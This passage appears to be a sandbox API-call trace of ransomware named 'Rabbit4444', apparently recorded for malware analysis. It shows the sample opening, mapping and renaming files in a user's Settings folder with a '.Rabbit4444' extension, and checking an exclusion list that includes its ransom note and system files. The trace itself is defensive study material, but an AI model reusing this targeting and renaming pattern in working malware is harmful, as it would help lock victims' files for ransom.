"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.257] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.257] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15056734346) returned 1 [0059.257] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=867) returned 1 [0059.257] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.257] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0059.257] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x670, lpName=0x0) returned 0x298 [0059.258] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x670) returned 0x70000 [0059.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.259] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15056993469) returned 1 [0059.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.259] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0059.259] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.259] CloseHandle (hObject=0x298) returned 1 [0059.259] CloseHandle (hObject=0x278) returned 1 [0059.259] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms.Rabbit4444") returned 192 [0059.260] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.260] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5462dbf9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5462dbf9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2216c19d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", cAlternateFileName="CLA4B7~1.SET")) returned 1 [0059.260] lstrcmpiW (lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.260] lstrcmpiW (lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.261] lstrcmpiW (lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.261] lstrcmpiW (lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", lpString2=".") returned 1 [0059.261] lstrcmpiW (lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", lpString2="..") returned 1 [0059.261] lstrcmpiW (lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", lpString2="windows") returned -1 [0059.261] lstrcmpiW (lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.261] lstrcmpiW (lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.261] lstrcmpiW (lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", lpString2="boot") returned 1 [0059.261] lstrcmpiW (lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.261] lstrcmpiW (lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.261] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms" | out: lpString1="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms") returned="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms" [0059.261] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.261] lstrlenW (lpString="Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms") returned 64 [0059.261] lstrlenW (lpString="Rabbit4444") returned 10 [0059.261] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.261] lstrlenW (lpString=".dll") returned 4 [0059.261] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.261] lstrlenW (lpString=".lnk") returned 4 [0059.261] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.261] lstrlenW (lpString=".ini") returned 4 [0059.261] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.261] lstrlenW (lpString=".sys") returned 4 [0059.261] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.262] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.262] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.262] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15057260535) returned 1 [0059.262] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=913) returned 1 [0059.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0059.262] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0059.276] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0059.276] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.276] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.276] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.277] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15058767226) returned 1 [0059.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0059.277] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.277] CloseHandle (hObject=0x298) returned 1 [0059.277] CloseHandle (hObject=0x278) returned 1 [0059.277] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms.Rabbit4444") returned 192 [0059.277] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.278] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x546c6571, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x546c6571, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2328efd5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x41f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", cAlternateFileName="CL1987~1.SET")) returned 1 [0059.278] lstrcmpiW (lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.278] lstrcmpiW (lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.278] lstrcmpiW (lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.278] lstrcmpiW (lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", lpString2=".") returned 1 [0059.278] lstrcmpiW (lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", lpString2="..") returned 1 [0059.278] lstrcmpiW (lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", lpString2="windows") returned -1 [0059.279] lstrcmpiW (lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.279] lstrcmpiW (lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.279] lstrcmpiW (lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", lpString2="boot") returned 1 [0059.279] lstrcmpiW (lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.279] lstrcmpiW (lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.279] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms" | out: lpString1="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms") returned="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms" [0059.279] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.279] lstrlenW (lpString="Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms") returned 64 [0059.279] lstrlenW (lpString="Rabbit4444") returned 10 [0059.279] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.279] lstrlenW (lpString=".dll") returned 4 [0059.279] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.279] lstrlenW (lpString=".lnk") returned 4 [0059.279] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.279] lstrlenW (lpString=".ini") returned 4 [0059.279] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.279] lstrlenW (lpString=".sys") returned 4 [0059.279] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.279] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9ef86966-2f35-49be-a9f6-398e0b844411}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.280] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.280] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15059036863) returned 1 [0059.280] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1055) returned 1 [0059.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0059.280] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x298 [0059.281] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x70000 [0059.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.282] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15059289104) returned 1 [0059.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0059.282] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.282] CloseHandle (hObject=0x298) returned 1 [0059.282] CloseHandle (hObject=0x278) returned 1 [0059.282] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms.Rabbit4444") returned 192 [0059.283] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9ef86966-2f35-49be-a9f6-398e0b844411}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9ef86966-2f35-49be-a9f6-398e0b844411}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.283] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5475eecd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5475eecd, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2216c19d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x409, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", cAlternateFileName="CL53E1~1.SET")) returned 1 [0059.283] lstrcmpiW (lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.284] lstrcmpiW (lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.284] lstrcmpiW (lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.284] lstrcmpiW (lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", lpString2=".") returned 1 [0059.284] lstrcmpiW (lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", lpString2="..") returned 1 [0059.284] lstrcmpiW (lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", lpString2="windows") returned -1 [0059.284] lstrcmpiW (lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.284] lstrcmpiW (lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.284] lstrcmpiW (lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", lpString2="boot") returned 1 [0059.284] lstrcmpiW (lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.284] lstrcmpiW (lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.284] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms" | out: lpString1="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms") returned="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms" [0059.284] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.284] lstrlenW (lpString="Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms") returned 64 [0059.284] lstrlenW (lpString="Rabbit4444") returned 10 [0059.284] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.284] lstrlenW (lpString=".dll") returned 4 [0059.284] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.284] lstrlenW (lpString=".lnk") returned 4 [0059.284] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.284] lstrlenW (lpString=".ini") returned 4 [0059.284] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.284] lstrlenW (lpString=".sys") returned 4 [0059.284] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.284] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.285] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.285] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15059746849) returned 1 [0059.287] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1033) returned 1 [0059.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0059.287] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0059.288] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0059.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.289] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15060010995) returned 1 [0059.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0059.289] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.290] CloseHandle (hObject=0x298) returned 1 [0059.290] CloseHandle (hObject=0x278) returned 1 [0059.290] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms.Rabbit4444") returned 192 [0059.290] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms"), 